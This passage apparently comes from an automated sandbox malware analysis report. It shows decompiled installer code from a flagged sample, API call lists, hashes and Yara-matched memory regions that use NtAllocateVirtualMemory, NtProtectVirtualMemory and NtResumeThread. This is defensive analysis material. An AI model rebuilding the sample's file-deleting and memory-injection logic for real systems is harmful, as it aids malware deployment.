                                                                                                                        										__eflags = _v8 - _t52;
                                                                                                                        										if(_v8 == _t52) {
                                                                                                                        											 *0x434f88 =  *0x434f88 + 1;
                                                                                                                        										} else {
                                                                                                                        											E0040559F(0xfffffff1, _t68);
                                                                                                                        											E004062FD(_t67, _t68, 0);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                        									if(__eflags == 0) {
                                                                                                                        										E00405C49(__eflags, _t68, _a8);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L24;
                                                                                                                        							}
                                                                                                                        							__eflags = _v558;
                                                                                                                        							if(_v558 == 0) {
                                                                                                                        								goto L24;
                                                                                                                        							}
                                                                                                                        							__eflags = _v558 - 0x2e;
                                                                                                                        							if(_v558 != 0x2e) {
                                                                                                                        								goto L16;
                                                                                                                        							}
                                                                                                                        							__eflags = _v556;
                                                                                                                        							if(_v556 == 0) {
                                                                                                                        								goto L24;
                                                                                                                        							}
                                                                                                                        							goto L16;
                                                                                                                        							L24:
                                                                                                                        							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                                        							__eflags = _t55;
                                                                                                                        						} while (_t55 != 0);
                                                                                                                        						_t38 = FindClose(_t70);
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					__eflags =  *0x42f270 - 0x5c;
                                                                                                                        					if( *0x42f270 != 0x5c) {
                                                                                                                        						goto L11;
                                                                                                                        					}
                                                                                                                        					goto L10;
                                                                                                                        				} else {
                                                                                                                        					__eflags = _t38;
                                                                                                                        					if(_t38 == 0) {
                                                                                                                        						L28:
                                                                                                                        						__eflags = _a4;
                                                                                                                        						if(_a4 == 0) {
                                                                                                                        							L36:
                                                                                                                        							return _t38;
                                                                                                                        						}
                                                                                                                        						__eflags = _v12;
                                                                                                                        						if(_v12 != 0) {
                                                                                                                        							_t38 = E00406873(_t68);
                                                                                                                        							__eflags = _t38;
                                                                                                                        							if(_t38 == 0) {
                                                                                                                        								goto L36;
                                                                                                                        							}
                                                                                                                        							E00405E0C(_t68);
                                                                                                                        							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                                                                        							__eflags = _t38;
                                                                                                                        							if(_t38 != 0) {
                                                                                                                        								return E0040559F(0xffffffe5, _t68);
                                                                                                                        							}
                                                                                                                        							__eflags = _v8;
                                                                                                                        							if(_v8 == 0) {
                                                                                                                        								goto L30;
                                                                                                                        							}
                                                                                                                        							E0040559F(0xfffffff1, _t68);
                                                                                                                        							return E004062FD(_t67, _t68, 0);
                                                                                                                        						}
                                                                                                                        						L30:
                                                                                                                        						 *0x434f88 =  *0x434f88 + 1;
                                                                                                                        						return _t38;
                                                                                                                        					}
                                                                                                                        					__eflags = _t65 & 0x00000002;
                                                                                                                        					if((_t65 & 0x00000002) == 0) {
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					goto L5;
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                        • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                        • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                        • API String ID: 2035342205-1953461807
                                                                                                                        • Opcode ID: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
                                                                                                                        • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                        • Opcode Fuzzy Hash: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
                                                                                                                        • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                        • String ID: %}?b$l&I]$l&I]
                                                                                                                        • API String ID: 3389902171-3838461540
                                                                                                                        • Opcode ID: 0af3f9886d7e21aa318378c66a07f8baab32a272df54d77d2a3ddbf4da8a3793
                                                                                                                        • Instruction ID: 6198f18f42cbff1bde6c69316bad5870655eca694cbd60959048ad6069b3baa0
                                                                                                                        • Opcode Fuzzy Hash: 0af3f9886d7e21aa318378c66a07f8baab32a272df54d77d2a3ddbf4da8a3793
                                                                                                                        • Instruction Fuzzy Hash: 6C723B34A443868FDF359F38C9E47DA7BA29F133A0F99816ECC968B196DB314446C712
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02AD30F0: LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(-7040BA74,?,-0234DF94), ref: 02AD41C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                        • String ID: 0Bh
                                                                                                                        • API String ID: 2616484454-3315039483
                                                                                                                        • Opcode ID: e1d3674897020c63187704d9b5299f8b0c7922766cf3576200239cd655fcec3a
                                                                                                                        • Instruction ID: e0370bc03603be1923f3419239fb102aef056a11834965cbf0d7b86016dd159c
                                                                                                                        • Opcode Fuzzy Hash: e1d3674897020c63187704d9b5299f8b0c7922766cf3576200239cd655fcec3a
                                                                                                                        • Instruction Fuzzy Hash: 10917B71A0434ADFDF306E689DA97DA37B2AF163A0F95012EDC8A5B204D7358985CF42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: `$pH'
                                                                                                                        • API String ID: 0-1335892094
                                                                                                                        • Opcode ID: 29e22742ad0db6132339963a9f867afc5d17a4a9edea425fffb956324c5ad5c5
                                                                                                                        • Instruction ID: c01859cc8adee6a5d640891668bfbd808dee18d84d10abf170c748eaacf35815
                                                                                                                        • Opcode Fuzzy Hash: 29e22742ad0db6132339963a9f867afc5d17a4a9edea425fffb956324c5ad5c5
                                                                                                                        • Instruction Fuzzy Hash: C5516B75B0034ADFDF309E788EA93DE36A7DF55790FA5412ECC499B144DB3186868B02
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: 0E
                                                                                                                        • API String ID: 1029625771-2513510507
                                                                                                                        • Opcode ID: 279e86f0c9b88369204c6d8dce46fdac7186af31afb174db97caa05785c18edf
                                                                                                                        • Instruction ID: 4c859ba48678d2e7f6e8440cf7e061df526d22ae823967ff1e2697d6a830a6af
                                                                                                                        • Opcode Fuzzy Hash: 279e86f0c9b88369204c6d8dce46fdac7186af31afb174db97caa05785c18edf
                                                                                                                        • Instruction Fuzzy Hash: EDD1757164434A9FDF349E388DA47DB37A7EF66790F91412ECC899B204DB318986CB42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: "px
                                                                                                                        • API String ID: 1029625771-3637282809
                                                                                                                        • Opcode ID: e484ffc0855224ecdbb8961cb1bb17619bbc73138e05db0db40255a494aaa61c
                                                                                                                        • Instruction ID: e71e5351d8180bf122f50f702b420eba905e87929d5c94452ec479bd22d052d1
                                                                                                                        • Opcode Fuzzy Hash: e484ffc0855224ecdbb8961cb1bb17619bbc73138e05db0db40255a494aaa61c
                                                                                                                        • Instruction Fuzzy Hash: 799108B57003079FDF209E6889B97D637A2AF663D0FD50129DCCA97205E7358847CB15
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 67%
                                                                                                                        			E004021AA(void* __eflags) {
                                                                                                                        				signed int _t52;
                                                                                                                        				void* _t56;
                                                                                                                        				intOrPtr* _t60;
                                                                                                                        				intOrPtr _t61;
                                                                                                                        				intOrPtr* _t62;
                                                                                                                        				intOrPtr* _t64;
                                                                                                                        				intOrPtr* _t66;
                                                                                                                        				intOrPtr* _t68;
                                                                                                                        				intOrPtr* _t70;
                                                                                                                        				intOrPtr* _t72;
                                                                                                                        				intOrPtr* _t74;
                                                                                                                        				intOrPtr* _t76;
                                                                                                                        				intOrPtr* _t78;
                                                                                                                        				intOrPtr* _t80;
                                                                                                                        				void* _t83;
                                                                                                                        				intOrPtr* _t91;
                                                                                                                        				signed int _t101;
                                                                                                                        				signed int _t105;
                                                                                                                        				void* _t107;
                                                                                                                        
                                                                                                                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                                                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                                                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                                                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                                                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                                                        				_t52 =  *(_t107 - 0x20);
                                                                                                                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                                                        				_t101 = _t52 & 0x00008000;
                                                                                                                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                                                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                                                        				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                                                        					E00402DA6(0x21);
                                                                                                                        				}
                                                                                                                        				_t56 = _t107 + 8;
                                                                                                                        				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56); // executed
                                                                                                                        				if(_t56 < _t83) {
                                                                                                                        					L14:
                                                                                                                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                                                        					_push(0xfffffff0);
                                                                                                                        				} else {
                                                                                                                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                                                                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                                                        					if(_t61 >= _t83) {
                                                                                                                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                                                        						if(_t101 == _t83) {
                                                                                                                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick");
                                                                                                                        						}
                                                                                                                        						if(_t105 != _t83) {
                                                                                                                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                                                        						}
                                                                                                                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                                                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                                                        						if( *_t91 != _t83) {
                                                                                                                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                                                        						}
                                                                                                                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                                                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                                                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                                                        						}
                                                                                                                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                        					}
                                                                                                                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                        						_push(0xfffffff4);
                                                                                                                        					} else {
                                                                                                                        						goto L14;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				E00401423();
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick, xrefs: 00402269
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInstance
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick
                                                                                                                        • API String ID: 542301482-2621469430
                                                                                                                        • Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                                                        • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                        • Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                                                        • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNELBASE(?,9D909E4F,0B0E5984), ref: 02AD275E
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileLibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2049390123-0
                                                                                                                        • Opcode ID: b613a91650e683100a9454aff71c5bc8ee2ff07ebdb0d99fb3b00b29b7220acf
                                                                                                                        • Instruction ID: fd431d2e9b7cbc6cd5f6503b55ef6ddfeb3798f8ca78b63009e4a63f76206ed0
                                                                                                                        • Opcode Fuzzy Hash: b613a91650e683100a9454aff71c5bc8ee2ff07ebdb0d99fb3b00b29b7220acf
                                                                                                                        • Instruction Fuzzy Hash: 22512674B44346DFEF346E7899A57EB77A2AF15390F84402EEC8A9B201DB354985CB02
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406873(WCHAR* _a4) {
                                                                                                                        				void* _t2;
                                                                                                                        
                                                                                                                        				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                                                                        				if(_t2 == 0xffffffff) {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				FindClose(_t2);
                                                                                                                        				return 0x4302b8;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(75AF3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                        • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                        • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                        • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: bf431e50725fce77dd54170505b4e4488689cf81dd0cb4c7d28af66e6ccf7df8
                                                                                                                        • Instruction ID: 6fb4aaa480cfc0ed17ffc06f0f9b5570c510d247b069f56852c78ceaaf7ffd5f
                                                                                                                        • Opcode Fuzzy Hash: bf431e50725fce77dd54170505b4e4488689cf81dd0cb4c7d28af66e6ccf7df8
                                                                                                                        • Instruction Fuzzy Hash: EB816975A4034ADFDF349E288D647DA37A3AF657A0FD5412DDC899B204E7358A82CB01
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtResumeThread.NTDLL(00000001,02AD6DFF), ref: 02AD68CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: b7fae60c55ca882dff55560fbe4d999b2fdcec32e3df060f09d599a22cff2744
                                                                                                                        • Instruction ID: e41a18277c12b923c016e1b652fb8884b7bcc00e0155312cc3daae4770594a50
                                                                                                                        • Opcode Fuzzy Hash: b7fae60c55ca882dff55560fbe4d999b2fdcec32e3df060f09d599a22cff2744
                                                                                                                        • Instruction Fuzzy Hash: 8921253574530ADBCB399E68A5C06EE77BAEF45B50F24402ECC478B605DF319448CB82
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL(3704DE41,?,?,?,?,02AD5091,-0000000115BF1CF6,02AC177A), ref: 02AD6092
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: d840eadb1688fcd57cbf88ef0210ea18566cb4b9c5b3df86bd5bad4ce47229d7
                                                                                                                        • Instruction ID: 73b29be268474d36b4ec47a73a88412aa8ebd64ad891da455356630e4a0e633c
                                                                                                                        • Opcode Fuzzy Hash: d840eadb1688fcd57cbf88ef0210ea18566cb4b9c5b3df86bd5bad4ce47229d7
                                                                                                                        • Instruction Fuzzy Hash: B4118B7460478BDFDB249E2CC8A47EA37B6EF99390F88402EDC8997240D7715E06C610
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 41%
                                                                                                                        			E0040290B(short __ebx, short* __edi) {
                                                                                                                        				void* _t8;
                                                                                                                        				void* _t21;
                                                                                                                        
                                                                                                                        				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
                                                                                                                        				if(_t8 != 0xffffffff) {
                                                                                                                        					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                                        					_push(_t21 - 0x2b0);
                                                                                                                        					_push(__edi);
                                                                                                                        					E0040653D();
                                                                                                                        				} else {
                                                                                                                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                                        					 *__edi = __ebx;
                                                                                                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                                                        • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                        • Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                                                        • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        C-Code - Quality: 84%
